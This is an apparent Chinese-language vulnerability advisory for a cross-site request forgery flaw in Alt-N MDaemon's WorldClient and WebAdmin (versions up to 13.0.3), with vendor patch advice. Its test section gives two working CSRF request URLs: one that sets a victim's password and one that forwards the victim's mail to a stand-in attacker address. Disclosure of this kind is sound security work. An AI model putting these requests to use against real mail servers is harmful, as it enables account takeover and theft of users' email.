Alt-N MDaemon和WebAdmin跨站请求伪造漏洞

Alt-N MDaemon和WebAdmin跨站请求伪造漏洞

发布日期：2013-02-18
更新日期：2013-02-24

受影响系统：
Alt-N MDaemon <= 13.0.3
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58076
 
Alt-N MDaemon是一款基于Windows的邮件服务程序，WorldClient是其客户端。
 
MDaemon 13.0.3 & v12.5.6的WorldClient和WebAdmin应用在实现上存在跨站请求伪造漏洞。Session参数已经提供了部分保护，但还不够。攻击者可利用此漏洞在受影响应用中执行不同的操作。
 
<*来源：QSecure
        Demetris Papapetrou
 
  链接：http://seclists.org/bugtraq/2013/Feb/98
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Change Password:
 http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n

 Enable Forwarding:
 http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=evil%40example.com

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
Alt-N
 -----
 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
 
http://www.altn.com